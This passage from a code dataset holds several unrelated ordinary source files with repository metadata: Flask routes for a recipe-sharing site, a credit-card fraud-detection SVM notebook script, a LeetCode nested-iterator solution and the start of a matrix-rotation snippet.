')).striptags())\n\n\n@app.route('/add_recipe', methods=['GET', 'POST'])\n@login_required\ndef add_recipe():\n form = RecipeForm()\n if form.validate_on_submit():\n uploaded_file = request.files['image']\n extension = uploaded_file.filename.split('.')[-1].lower()\n listTags = ','.join([tag.strip() for tag in form.tags.data.split(',')])\n recipe = Recipe(name=form.name.data, category=form.category.data, tags=listTags, serves=int(form.serves.data), description=form.description.data, ingredients=form.ingredients.data, steps=form.steps.data, author=current_user)\n seed = \"{:0>5d}\".format(randint(0,99999))\n filename = f'{recipe.urlify()}-by-{recipe.author.username.lower()}-{seed}.{extension}'\n uploaded_file.save(os.path.join(app.config['IMG_UPLOAD_PATH'], filename))\n resized_image = Image.open(os.path.join(app.config['IMG_UPLOAD_PATH'], filename))\n resized_image.thumbnail((1100, sys.maxsize),Image.ANTIALIAS)\n resized_image.save(os.path.join(app.config['IMG_UPLOAD_PATH'], filename))\n thumb = Image.open(os.path.join(app.config['IMG_UPLOAD_PATH'], filename))\n o_width, o_height = thumb.size\n if 1.0 * o_height / o_width > 0.75:\n thumb.thumbnail((500, sys.maxsize),Image.ANTIALIAS)\n else:\n thumb.thumbnail((sys.maxsize ,375),Image.ANTIALIAS)\n width, height = thumb.size\n thumb = thumb.crop(((width - 500)/2, (height - 375)/2, (width + 500)/2, (height + 375)/2))\n thumb.save(os.path.join(app.config['THUMBNAIL_PATH'], filename))\n recipe.image = filename\n db.session.add(recipe)\n current_user.notifications.append(Notification(content=f\"Your \\\"{recipe.name}\\\" recipe is now being moderated by our community.
No worries, that's normal! Every single recipe follows the same proccess.
What's next? Read our FAQ.\"))\n db.session.commit()\n flash('Your recipe has been sent for moderation! (Read FAQ)', 'alert-warning')\n return redirect(url_for('index')) \n return render_template('add_recipe.html', title='Add Recipe', form=form)\n\n@app.route('/index', methods=['GET'])\n@app.route('/', methods=['GET'])\ndef index():\n if not current_user.is_authenticated:\n flash(f'Please log in to enjoy the full Pukmun experience', 'alert-info')\n page = request.args.get('page', 1, type=int)\n top_users = User.query.join(Recipe).filter(Recipe.approved == True).group_by(User).order_by(func.count(User.recipes).desc()).limit(3).all()\n latest_comments = Comment.query.order_by(Comment.timestamp.desc()).limit(5).all()\n recipes = Recipe.query.filter(Recipe.approved == True).order_by(Recipe.timestamp.desc()).paginate(\n page, app.config['RECIPES_PER_PAGE'], False)\n return render_template(\"index.html\", title='Home', recipes=recipes, url=\"index\",\n comments=latest_comments, top_users=top_users)\n\n@app.route('/top_global', methods=['GET'])\ndef top_global():\n top_users = User.query.join(Recipe).filter(Recipe.approved == True).group_by(User).order_by(func.count(User.recipes).desc()).limit(3).all()\n latest_comments = Comment.query.order_by(Comment.timestamp.desc()).limit(5).all()\n top_recipes = Recipe.query.filter(Recipe.approved == True).outerjoin(RecipeLike).group_by(Recipe).order_by(func.count(RecipeLike.timestamp).desc())\n page = request.args.get('page', 1, type=int)\n recipes = top_recipes.paginate(\n page, app.config['RECIPES_PER_PAGE'], False)\n return render_template(\"top.html\", title=\"Top Global\", recipes=recipes,\n label=\"Top\", value=\"Global\", url='top_global',\n comments=latest_comments, top_users=top_users)\n\n@app.route('/top_month', methods=['GET'])\ndef top_month():\n top_users = User.query.join(Recipe).filter(Recipe.approved == True).group_by(User).order_by(func.count(User.recipes).desc()).limit(3).all()\n latest_comments = Comment.query.order_by(Comment.timestamp.desc()).limit(5).all()\n top_recipes = Recipe.query.filter(Recipe.approved == True).outerjoin(RecipeLike).group_by(Recipe).order_by(func.count(case([(RecipeLike.timestamp >= datetime.utcnow() - timedelta(days=30),1)])).desc())\n page = request.args.get('page', 1, type=int)\n recipes = top_recipes.paginate(\n page, app.config['RECIPES_PER_PAGE'], False)\n return render_template(\"top.html\", title=\"Top last 30 days\", recipes=recipes,\n url='top_month', label=\"Top\", value=\"last 30 days\",\n comments=latest_comments, top_users=top_users)\n\n@app.route('/top_week', methods=['GET'])\ndef top_week():\n top_users = User.query.join(Recipe).filter(Recipe.approved == True).group_by(User).order_by(func.count(User.recipes).desc()).limit(3).all()\n latest_comments = Comment.query.order_by(Comment.timestamp.desc()).limit(5).all()\n top_recipes = Recipe.query.filter(Recipe.approved == True).outerjoin(RecipeLike).group_by(Recipe).order_by(func.count(case([(RecipeLike.timestamp >= datetime.utcnow() - timedelta(days=7),1)])).desc())\n page = request.args.get('page', 1, type=int)\n recipes = top_recipes.paginate(\n page, app.config['RECIPES_PER_PAGE'], False)\n return render_template(\"top.html\", title=\"Top last 7 days\", recipes=recipes,\n url=\"top_week\", label=\"Top\", value=\"last 7 days\",\n comments=latest_comments, top_users=top_users)\n\n@app.route('/top_24h', methods=['GET'])\ndef top_24h():\n top_users = User.query.join(Recipe).filter(Recipe.approved == True).group_by(User).order_by(func.count(User.recipes).desc()).limit(3).all()\n latest_comments = Comment.query.order_by(Comment.timestamp.desc()).limit(5).all()\n top_recipes = Recipe.query.filter(Recipe.approved == True).outerjoin(RecipeLike).group_by(Recipe).order_by(func.count(case([(RecipeLike.timestamp >= datetime.utcnow() - timedelta(days=1),1)])).desc())\n page = request.args.get('page', 1, type=int)\n recipes = top_recipes.paginate(\n page, app.config['RECIPES_PER_PAGE'], False)\n return render_template(\"top.html\", title=\"Top last 24 hours\", recipes=recipes,\n url=\"top_24h\", label=\"Top\", value=\"last 24 hours\",\n comments=latest_comments, top_users=top_users)\n\n@app.route('/cookbook', methods=['GET'])\n@login_required\ndef cookbook():\n page = request.args.get('page', 1, type=int)\n top_users = User.query.join(Recipe).filter(Recipe.approved == True).group_by(User).order_by(func.count(User.recipes).desc()).limit(3).all()\n latest_comments = Comment.query.order_by(Comment.timestamp.desc()).limit(5).all()\n recipes = current_user.followed_recipes().paginate(\n page, app.config['RECIPES_PER_PAGE'], False)\n return render_template('cookbook.html', title='Cookbook',\n recipes=recipes, url=\"cookbook\",\n comments=latest_comments, top_users=top_users)\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n flash('Already logged in.', 'alert-warning')\n return redirect(url_for('index'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter(or_(User.username.ilike(form.username_or_email.data), User.email.ilike(form.username_or_email.data))).first()\n if user is None or not user.check_password(form.password.data):\n flash('Invalid username or password', 'alert-danger')\n return redirect(url_for('login'))\n elif not user.confirmed:\n flash(f'You still need to confirm your email. Didn\\'t get the email. Send me another confirmation email', 'alert-danger')\n return redirect(url_for('login'))\n login_user(user, remember=form.remember_me.data)\n flash('Logged in successfully!', 'alert-success')\n next_page = request.args.get('next')\n if not next_page or url_parse(next_page).netloc != '':\n next_page = url_for('index')\n return redirect(next_page)\n return render_template('login.html', title='Sign In', form=form)\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('index'))\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n flash('Already logged in', 'alert-warning')\n return redirect(url_for('index'))\n form = RegistrationForm()\n if form.validate_on_submit():\n user = User(username=form.username.data, email=form.email.data)\n user.set_password(form.password.data)\n db.session.add(user)\n db.session.commit()\n flash('User registered! Please check your e-mail to confirm your account.', 'alert-success')\n send_confirmation_email(user)\n return redirect(url_for('login'))\n return render_template('register.html', title='Register', form=form)\n\n@app.route('/user/')\n@login_required\ndef user(username):\n user = User.query.filter(User.username.ilike(username)).first_or_404()\n page = request.args.get('page', 1, type=int)\n recipes = user.my_approved_recipes().order_by(Recipe.timestamp.desc()).paginate(\n page, app.config['RECIPES_PER_PAGE'], False)\n form = EmptyForm()\n return render_template('user.html', title=user.username, user=user, recipes=recipes,\n url=\"user\", form=form,\n clean_about_me=Markup(user.about_me.replace(' ', ' ')).striptags())\n\n@app.before_request\ndef before_request():\n if current_user.is_authenticated:\n current_user.last_seen = datetime.utcnow()\n db.session.commit()\n\n@app.route('/edit_profile', methods=['GET', 'POST'])\n@login_required\ndef edit_profile():\n form_edit_profile = EditProfileForm(current_user.username, current_user.email)\n form_edit_avatar = UploadAvatarForm()\n if form_edit_avatar.validate_on_submit() and form_edit_avatar.submit.data:\n f = request.files.get('image')\n raw_filename = avatars.save_avatar(f)\n session['raw_filename'] = raw_filename\n return redirect(url_for('crop'))\n elif form_edit_profile.validate_on_submit() and form_edit_profile.submit.data:\n current_user.username = form_edit_profile.username.data\n current_user.about_me = form_edit_profile.about_me.data\n flash('Your changes have been saved.', 'alert-success')\n if current_user.email.lower() != form_edit_profile.email.data.lower():\n current_user.email = form_edit_profile.email.data\n current_user.confirmed = False\n db.session.commit()\n flash('Please check your e-mail to confirm your new e-mail address.', 'alert-info')\n send_confirmation_email(current_user)\n logout_user()\n return redirect(url_for('login'))\n current_user.email = form_edit_profile.email.data\n db.session.commit()\n return redirect(url_for('user', username=current_user.username.lower()))\n elif request.method == 'GET':\n form_edit_profile.username.data = current_user.username\n form_edit_profile.email.data = current_user.email\n form_edit_profile.about_me.data = current_user.about_me\n return render_template('edit_profile.html', title='Edit Profile',\n form_avatar=form_edit_avatar, form_profile=form_edit_profile)\n\n@app.route('/follow/', methods=['POST'])\n@login_required\ndef follow(username):\n form = EmptyForm()\n if form.validate_on_submit():\n user = User.query.filter(User.username.ilike(username)).first()\n if user is None:\n flash(f'User {username} not found.', 'alert-danger')\n return redirect(url_for('index'))\n if user == current_user:\n flash('You cannot follow yourself!', 'alert-danger')\n return redirect(url_for('user', username=username))\n current_user.follow(user)\n db.session.commit()\n flash(f'You are following {username}!', 'alert-success')\n return redirect(url_for('user', username=username))\n else:\n flash(f'Something went wrong.', 'alert-danger')\n return redirect(url_for('index'))\n\n@app.route('/upvote/', methods=['POST'])\n@login_required\ndef upvote(recipe):\n form = EmptyForm()\n if form.validate_on_submit():\n recipe_voted = Recipe.query.filter_by(id=recipe, approved=False).first()\n if recipe_voted is None:\n flash(f'[ERROR] Recipe doesn\\'t exist or it has already been approved.', 'alert-danger')\n elif Vote.query.filter_by(voter_id=current_user.id, recipe_id=recipe_voted.id).first() is not None:\n flash(f'[ERROR] You\\'ve already voted this recipe.', 'alert-danger')\n else:\n vote = Vote(voter_id=current_user.id, recipe_id=recipe, is_positive=True)\n db.session.add(vote)\n flash(f'Thanks for your vote!', 'alert-success')\n if recipe_voted.upvotes() >= app.config['VOTES_TO_APPROVE']:\n recipe_voted.approve()\n for vote_to_remove in recipe_voted.votes_received():\n db.session.delete(vote_to_remove)\n new_notification = Notification(content=f'Congraulations, your {recipe_voted.name} recipe has just been approved by the community and is online.
Thanks for keep Pukmun going!', recipient_id=recipe_voted.author.id)\n db.session.add(new_notification)\n db.session.commit()\n else:\n flash(f'That\\'s not the way it works!', 'alert-danger')\n return redirect(url_for('index'))\n return redirect(url_for('moderate'))\n\n@app.route('/downvote/', methods=['POST'])\n@login_required\ndef downvote(recipe):\n form = EmptyForm()\n if form.validate_on_submit():\n recipe_voted = Recipe.query.filter_by(id=recipe, approved=False).first()\n if recipe_voted is None:\n flash(f'[ERROR] Recipe does\\'t exist or it has already been approved.', 'alert-danger')\n elif Vote.query.filter_by(voter_id=current_user.id, recipe_id=recipe_voted.id).first() is not None:\n flash(f'[ERROR] You\\'ve already voted this recipe.', 'alert-danger')\n else:\n vote = Vote(voter_id=current_user.id, recipe_id=recipe, is_positive=False)\n db.session.add(vote)\n flash(f'Thanks for your vote!', 'alert-success')\n if recipe_voted.downvotes() >= app.config['VOTES_TO_REJECT']:\n new_notification = Notification(content=f'Dear user, your {recipe_voted.name} recipe has sadly been rejected by the community.
Read our FAQ to understand more about the process.', recipient_id=recipe_voted.author.id)\n db.session.add(new_notification)\n db.session.delete(recipe_voted)\n os.remove(os.path.join(app.config['IMG_UPLOAD_PATH'], recipe_voted.image))\n os.remove(os.path.join(app.config['THUMBNAIL_PATH'], recipe_voted.image))\n db.session.commit()\n else:\n flash(f'That\\'s not the way it works!', 'alert-danger')\n return redirect(url_for('index'))\n return redirect(url_for('moderate'))\n\n@app.route('/moderate', methods=['GET'])\n@login_required\ndef moderate():\n #left-join\n recipe = Recipe.query.outerjoin(Vote).filter(Recipe.approved == False, Recipe.author != current_user, or_(Vote.voter_id == None, Vote.voter_id != current_user.id)).order_by(func.random()).first()\n form = EmptyForm()\n return render_template('moderate.html', title='Moderation Area',\n recipe=recipe, form=form)\n\n@app.route('/privacy', methods=['GET'])\ndef privacy():\n return render_template('privacy.html', title='Privacy Notice')\n\n@app.route('/legal', methods=['GET'])\ndef legal():\n return render_template('legal.html', title='Legal Terms')\n\n@app.route('/see/', methods=['POST'])\n@login_required\ndef see(notification):\n form = EmptyForm()\n if form.validate_on_submit():\n notif = Notification.query.filter(Notification.id == notification, Notification.recipient_id == current_user.id, Notification.seen == False).first()\n if notif is None:\n flash(f'[ERROR] Message does not exist or was already marked as seen.', 'alert-danger')\n else:\n notif.seen = True\n db.session.commit()\n flash(f'Message marked as seen!', 'alert-success')\n return redirect(url_for('msg'))\n\n@app.route('/see_all', methods=['POST'])\n@login_required\ndef see_all():\n form = EmptyForm()\n if form.validate_on_submit():\n notifications = Notification.query.filter(Notification.recipient_id == current_user.id, Notification.seen == False).all()\n for notification in notifications:\n notification.seen = True\n db.session.commit()\n flash(f'Everything marked as seen!', 'alert-success')\n return redirect(url_for('msg'))\n\n@app.route('/remove_all', methods=['POST'])\n@login_required\ndef remove_all():\n form = EmptyForm()\n if form.validate_on_submit():\n notifications = Notification.query.filter(Notification.recipient_id == current_user.id).all()\n for notification in notifications:\n db.session.delete(notification)\n db.session.commit()\n flash(f'All notifications removed', 'alert-success')\n return redirect(url_for('msg'))\n\n@app.route('/unsee/', methods=['POST'])\n@login_required\ndef unsee(notification):\n form = EmptyForm()\n if form.validate_on_submit():\n notif = Notification.query.filter(Notification.id == notification, Notification.recipient_id == current_user.id, Notification.seen == True).first()\n if notif is None:\n flash(f'[ERROR] Message does not exist or was already marked as unseen.', 'alert-danger')\n else:\n notif.seen = False\n db.session.commit()\n flash(f'Message marked as unseen!', 'alert-success')\n return redirect(url_for('msg'))\n\n@app.route('/remove_notification/', methods=['POST'])\n@login_required\ndef remove_notification(notification):\n form = EmptyForm()\n if form.validate_on_submit():\n notif = Notification.query.filter(Notification.id == notification, Notification.recipient_id == current_user.id).first()\n if notif is None:\n flash(f'[ERROR] Message does not exist or was already removed', 'alert-danger')\n else:\n db.session.delete(notif)\n db.session.commit()\n flash(f'Message removed!', 'alert-success')\n return redirect(url_for('msg'))\n\n@app.route('/unfollow/', methods=['POST'])\n@login_required\ndef unfollow(username):\n form = EmptyForm()\n if form.validate_on_submit():\n user = User.query.filter(User.username.ilike(username)).first()\n if user is None:\n flash(f'User {username} not found.', 'alert-danger')\n return redirect(url_for('index'))\n if user == current_user:\n flash('You cannot unfollow yourself!')\n return redirect(url_for('user', username=username), 'alert-danger')\n current_user.unfollow(user)\n db.session.commit()\n flash(f'You are not following {username}.', 'alert-success')\n return redirect(url_for('user', username=username))\n else:\n flash(f'Something went wrong.', 'alert-danger')\n return redirect(url_for('index'))\n\n@app.route('/msg')\n@login_required\ndef msg():\n form = EmptyForm()\n page = request.args.get('page', 1, type=int)\n notifications = Notification.query.filter_by(recipient_id=current_user.id).order_by(Notification.timestamp.desc()).paginate(\n page, app.config['NOTIFICATIONS_PER_PAGE'], False)\n return render_template(\"notifications.html\", title='Notifications', form=form,\n notifications=notifications, url=\"msg\") \n\n@app.route('/liked')\n@login_required\ndef liked():\n page = request.args.get('page', 1, type=int)\n top_users = User.query.join(Recipe).filter(Recipe.approved == True).group_by(User).order_by(func.count(User.recipes).desc()).limit(3).all()\n latest_comments = Comment.query.order_by(Comment.timestamp.desc()).limit(5).all()\n recipes = Recipe.query.filter(Recipe.likes.any(user_id=current_user.id)).order_by(Recipe.timestamp.desc()).paginate(\n page, app.config['RECIPES_PER_PAGE'], False)\n return render_template(\"index.html\", title='Liked', recipes=recipes,\n url=\"liked\", label=\"Favourites\",\n comments=latest_comments, top_users=top_users)\n\n@app.route('/search', methods=['POST'])\ndef searchPost():\n search = request.form['search']\n return redirect(url_for('search', search=search.lower()))\n\n@app.route('/search/', methods=['GET'])\ndef search(search):\n if not search:\n search = request.get_data()\n page = request.args.get('page', 1, type=int)\n top_users = User.query.join(Recipe).filter(Recipe.approved == True).group_by(User).order_by(func.count(User.recipes).desc()).limit(3).all()\n latest_comments = Comment.query.order_by(Comment.timestamp.desc()).limit(5).all()\n recipes = Recipe.query.filter(Recipe.approved == True, or_(Recipe.name.like('%' + search + '%'), Recipe.tags.like('%' + search + '%'))).order_by(Recipe.timestamp.desc()).paginate(\n page, app.config['RECIPES_PER_PAGE'], False)\n return render_template(\"index.html\", title=\"Search: \"+search, recipes=recipes,\n url=\"search\", label=\"Search\", value=search,\n comments=latest_comments, top_users=top_users)\n\n@app.route('/category/')\ndef category(category):\n page = request.args.get('page', 1, type=int)\n top_users = User.query.join(Recipe).filter(Recipe.approved == True).group_by(User).order_by(func.count(User.recipes).desc()).limit(3).all()\n latest_comments = Comment.query.order_by(Comment.timestamp.desc()).limit(5).all()\n recipes = Recipe.query.filter(Recipe.approved == True, Recipe.category.like('%' + category + '%')).order_by(Recipe.timestamp.desc()).paginate(\n page, app.config['RECIPES_PER_PAGE'], False)\n return render_template(\"index.html\", title=\"Category: \"+category, recipes=recipes,\n url=\"category\", label='Category', value=category,\n comments=latest_comments, top_users=top_users)\n\n@app.route('/tag/')\ndef tag(tag):\n page = request.args.get('page', 1, type=int)\n top_users = User.query.join(Recipe).filter(Recipe.approved == True).group_by(User).order_by(func.count(User.recipes).desc()).limit(3).all()\n latest_comments = Comment.query.order_by(Comment.timestamp.desc()).limit(5).all()\n recipes = Recipe.query.filter(Recipe.approved == True, Recipe.tags.like('%' + tag + '%')).order_by(Recipe.timestamp.desc()).paginate(\n page, app.config['RECIPES_PER_PAGE'], False)\n return render_template(\"index.html\", title=\"Tag: \"+tag, recipes=recipes,\n url=\"tag\", label=\"Tag\", value=tag,\n comments=latest_comments, top_users=top_users)\n\n@app.route('/reset_password_request', methods=['GET', 'POST'])\ndef reset_password_request():\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n form = ResetPasswordRequestForm()\n if form.validate_on_submit():\n user = User.query.filter(User.email.ilike(form.email.data)).first()\n if user:\n send_password_reset_email(user)\n flash('Check your email for the instructions to reset your password', 'alert-info')\n return redirect(url_for('login'))\n return render_template('reset_password_request.html',\n title='Reset Password', form=form)\n\n@app.route('/confirmation_request', methods=['GET', 'POST'])\ndef confirmation_request():\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n form = ConfirmationRequestForm()\n if form.validate_on_submit():\n user = User.query.filter(User.email.ilike(form.email.data)).first()\n if user:\n send_confirmation_email(user)\n flash('Check your email for the instructions to confirm your account', 'alert-info')\n return redirect(url_for('login'))\n return render_template('confirmation_request.html',\n title='Confirmation Request', form=form)\n\n@app.route('/reset_password/', methods=['GET', 'POST'])\ndef reset_password(token):\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n user = User.verify_reset_password_token(token)\n if not user:\n flash('Invalid request (Link expired?)', 'alert-danger')\n return redirect(url_for('index'))\n form = ResetPasswordForm()\n if form.validate_on_submit():\n user.set_password(form.password.data)\n db.session.commit()\n flash('Your password has been reset.', 'alert-success')\n return redirect(url_for('login'))\n return render_template('reset_password.html', form=form)\n\n@app.route('/confirmation/', methods=['GET', 'POST'])\ndef confirmation(token):\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n user = User.verify_confirmation_token(token)\n if not user:\n flash('Invalid request (Link expired?)', 'alert-danger')\n return redirect(url_for('index'))\n else:\n user.confirmed = True\n db.session.commit()\n flash('Your e-mail has been confirmed.', 'alert-success')\n return redirect(url_for('login'))\n\n@app.route('/avatars/')\ndef get_avatar(filename):\n return send_from_directory(app.config['AVATARS_SAVE_PATH'], filename)\n\n@app.route('/img/')\ndef get_img(filename):\n if filename == '':\n return send_from_directory(app.config['IMG_UPLOAD_PATH'], \"no_img.png\")\n return send_from_directory(app.config['IMG_UPLOAD_PATH'], filename)\n\n@app.route('/img/thumbs/')\ndef get_thumb(filename):\n if filename == '':\n return send_from_directory(app.config['THUMBNAIL_PATH'], \"no_img.png\")\n return send_from_directory(app.config['THUMBNAIL_PATH'], filename)\n\n@app.route('/crop', methods=['GET', 'POST'])\n@login_required\ndef crop():\n form = CropAvatarForm()\n if form.validate_on_submit():\n filenames = avatars.crop_avatar(session['raw_filename'], form.x.data, form.y.data, form.w.data, form.h.data)\n current_user.avatar_s = url_for('get_avatar', filename=filenames[0])\n current_user.avatar_m = url_for('get_avatar', filename=filenames[1])\n current_user.avatar_l = url_for('get_avatar', filename=filenames[2])\n db.session.commit()\n os.remove(os.path.join(app.config['AVATARS_SAVE_PATH'], session['raw_filename']))\n flash('Your changes have been saved.', 'alert-success')\n return redirect(url_for('edit_profile'))\n return render_template('crop.html', title='Crop Image', form=form)\n\n@app.route('/like//')\n@login_required\ndef like_action(recipe_id, action):\n recipe = Recipe.query.filter_by(id=recipe_id, approved=True).first_or_404()\n if action == 'like':\n current_user.like_recipe(recipe)\n db.session.commit()\n flash('You now like this recipe.', 'alert-success')\n if action == 'unlike':\n current_user.unlike_recipe(recipe)\n db.session.commit()\n flash('You don\\'t like this recipe anymore.', 'alert-success')\n return redirect(request.referrer)","repo_name":"xiringuelu/pukmun","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":29982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36009468349","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Credit Card Fraud Detection\n\n# In[3]:\n\n\nimport pandas as pd\nimport numpy as np\n\nfrom sklearn import preprocessing\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn import svm\n\nimport itertools\n\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\n\nimport seaborn as sns\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# In[4]:\n\n\ndata = pd.read_csv('creditcard.csv')\ndata.head()\n\n\n# In[5]:\n\n\ndf = pd.DataFrame(data)\n\n\n# In[6]:\n\n\ndf.shape #checking the size of the data\n\n\n# In[7]:\n\n\n# checking the information\ndf.info()\n\n\n# In[8]:\n\n\ndf.describe()\n\n\n# In[9]:\n\n\ndf_fraud = df[df['Class'] == 1] \nplt.figure(figsize=(15,10))\nplt.scatter(df_fraud['Time'], df_fraud['Amount']) \nplt.title('Amount Fraud')\nplt.xlabel('Time')\nplt.ylabel('Amount')\nplt.xlim([0,175000])\nplt.ylim([0,2500])\nplt.show()\n\n\n# In[10]:\n\n\nbig_fraud = df_fraud[df_fraud['Amount'] > 1000].shape[0]\nprint('There are only '+ str(big_fraud) + ' frauds where the amount was bigger than 1000 over ' + str(df_fraud.shape[0]) + ' frauds')\n\n\n# # Unbalanced Data\n\n# In[12]:\n\n\nfraud = len(data[data.Class==1])\nno_fraud = len(data[data.Class ==0])\nprint('There are only '+ str(fraud) + ' frauds in the original dataset, even though there are ' + str(no_fraud) +' no frauds in the dataset.')\n\n\n# In[13]:\n\n\n# Accuracy of the fraudlent\nprint(\"The accuracy of the classifier then would be : \"+ str((284315-492)/284315)+ \" which is the number of good classification over the number of tuple to classify\")\n\n\n# # Correlation Features\n\n# In[15]:\n\n\ndf_corr = df.corr() \n\n\n# In[16]:\n\n\n# Heatmap\nplt.figure(figsize=(15,10))\nsns.heatmap(df_corr, cmap=\"YlGnBu\")\nsns.set(font_scale=2,style='white')\n\nplt.title('Heatmap correlation')\nplt.show()\n\n\n# In[17]:\n\n\nrank = df_corr['Class'] # Retrieving the correlation coefficients per feature in relation to the feature class\ndf_rank = pd.DataFrame(rank) \ndf_rank = np.abs(df_rank).sort_values(by='Class',ascending=False) # Ranking the absolute values of the coefficients\n # in descending order\ndf_rank.dropna(inplace=True) # Removing Missing Data (not a number)\n\n\n# # Data Selection\n\n# In[18]:\n\n\n# First we build our train dataset\ndf_train_all = df[0:150000] # We cut in two the original dataset\ndf_train_1 = df_train_all[df_train_all['Class'] == 1] # We seperate the data which are the frauds and the no frauds\ndf_train_0 = df_train_all[df_train_all['Class'] == 0]\nprint('In this dataset, we have ' + str(len(df_train_1)) +\" frauds so we need to take a similar number of non-fraud\")\n\ndf_sample=df_train_0.sample(300)\ndf_train = df_train_1.append(df_sample) # We gather the frauds with the no frauds. \ndf_train = df_train.sample(frac=1) # Then we mix our dataset\n\n\n# In[19]:\n\n\nX_train = df_train.drop(['Time', 'Class'],axis=1) # We drop the features Time (useless), and the Class (label)\ny_train = df_train['Class'] # We create our label\nX_train = np.asarray(X_train)\ny_train = np.asarray(y_train)\n\n\n# In[20]:\n\n\n###############\ndf_test_all = df[150000:]\n\nX_test_all = df_test_all.drop(['Time', 'Class'],axis=1)\ny_test_all = df_test_all['Class']\nX_test_all = np.asarray(X_test_all)\ny_test_all = np.asarray(y_test_all)\n\n\n# In[21]:\n\n\n\nX_train_rank = df_train[df_rank.index[1:11]] # We take the first ten ranked features\nX_train_rank = np.asarray(X_train_rank)\n\n\n# In[22]:\n\n\nX_train_rank = df_train[df_rank.index[1:11]] # We take the first ten ranked features\nX_train_rank = np.asarray(X_train_rank)\n\n\n# In[23]:\n\n\n\nX_test_all_rank = df_test_all[df_rank.index[1:11]]\nX_test_all_rank = np.asarray(X_test_all_rank)\ny_test_all = np.asarray(y_test_all)\n\n\n# # Confusion Matrix\n\n# In[25]:\n\n\nclass_names=np.array(['0','1']) # Binary label, Class = 1 (fraud) and Class = 0 (no fraud)\n\n\n# In[26]:\n\n\n# Function to plot the confusion Matrix\ndef plot_confusion_matrix(cm, classes,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = 'd' \n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\n\n# # Model Selection\n\n# In[27]:\n\n\nclassifier = svm.SVC(kernel='linear') # We set a SVM classifier, the default SVM Classifier (Kernel = Radial Basis Function)\n\n\n# In[28]:\n\n\n\nclassifier.fit(X_train, y_train) # Then we train our model, with our balanced data train.\n\n\n# # Testing the Model\n\n# In[29]:\n\n\nprediction_SVM_all = classifier.predict(X_test_all) #And finally, we predict our data test.\n\n\n# In[30]:\n\n\ncm = confusion_matrix(y_test_all, prediction_SVM_all)\nplot_confusion_matrix(cm,class_names)\n\n\n# In[31]:\n\n\nprint('Our criterion give a result of ' \n + str( ( (cm[0][0]+cm[1][1]) / (sum(cm[0]) + sum(cm[1])) + 4 * cm[1][1]/(cm[1][0]+cm[1][1])) / 5))\n\n\n# In[32]:\n\n\nprint('We have detected ' + str(cm[1][1]) + ' frauds / ' + str(cm[1][1]+cm[1][0]) + ' total frauds.')\nprint('\\nSo, the probability to detect a fraud is ' + str(cm[1][1]/(cm[1][1]+cm[1][0])))\nprint(\"the accuracy is : \"+str((cm[0][0]+cm[1][1]) / (sum(cm[0]) + sum(cm[1]))))\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n","repo_name":"bhubesh757/Lets_upgrade_AIML","sub_path":"AIML_PROJECT_7/CreditCard_FraudDetection.py","file_name":"CreditCard_FraudDetection.py","file_ext":"py","file_size_in_byte":5594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22437678460","text":"class NestedInteger(object):\r\n def __init__(self, val):\r\n self.val = val\r\n\r\n def isInteger(self):\r\n return isinstance(self.val, int)\r\n\r\n def getInteger(self):\r\n return self.val if self.isInteger() else None\r\n\r\n def getList(self):\r\n return self.val if not self.isInteger() else None\r\n\r\n @classmethod\r\n def val2nestedInteger(cls, v):\r\n if isinstance(v, int):\r\n return cls(v)\r\n else:\r\n res = []\r\n for i in v:\r\n res.append(cls.val2nestedInteger(i))\r\n return cls(res)\r\n\r\n @classmethod\r\n def list2nestedList(cls, l):\r\n res = []\r\n for v in l:\r\n res.append(cls.val2nestedInteger(v))\r\n return res\r\n\r\n\r\nclass NestedIterator(object):\r\n def __init__(self, nestedList):\r\n self.stack = []\r\n self.iter = iter(nestedList)\r\n self.val = self.move_to_next()\r\n\r\n def move_to_next(self):\r\n while True:\r\n cur_val = next(self.iter, None)\r\n if cur_val is None:\r\n if len(self.stack):\r\n self.iter = self.stack.pop()\r\n else:\r\n return None\r\n elif cur_val.isInteger():\r\n return cur_val.getInteger()\r\n else:\r\n self.stack.append(self.iter)\r\n self.iter = iter(cur_val.getList())\r\n\r\n def next(self):\r\n res = self.val\r\n self.val = self.move_to_next()\r\n return res\r\n\r\n def hasNext(self):\r\n return self.val is not None\r\n\r\n\r\nif __name__ == '__main__':\r\n i, v = NestedIterator(NestedInteger.list2nestedList([[], 1])), []\r\n while i.hasNext():\r\n v.append(i.next())\r\n print(v)\r\n","repo_name":"MadSkittles/leetcode","sub_path":"341.py","file_name":"341.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42603236618","text":"import numpy as np\r\n\r\n\"\"\"\r\nvoid rotate(int** matrix, int matrixSize, int* matrixColSize){\r\n //先转置矩阵\r\n for (int i = 0; i < matrixSize; ++i)\r\n for (int j = 0; j < i; ++j){\r\n int temp = 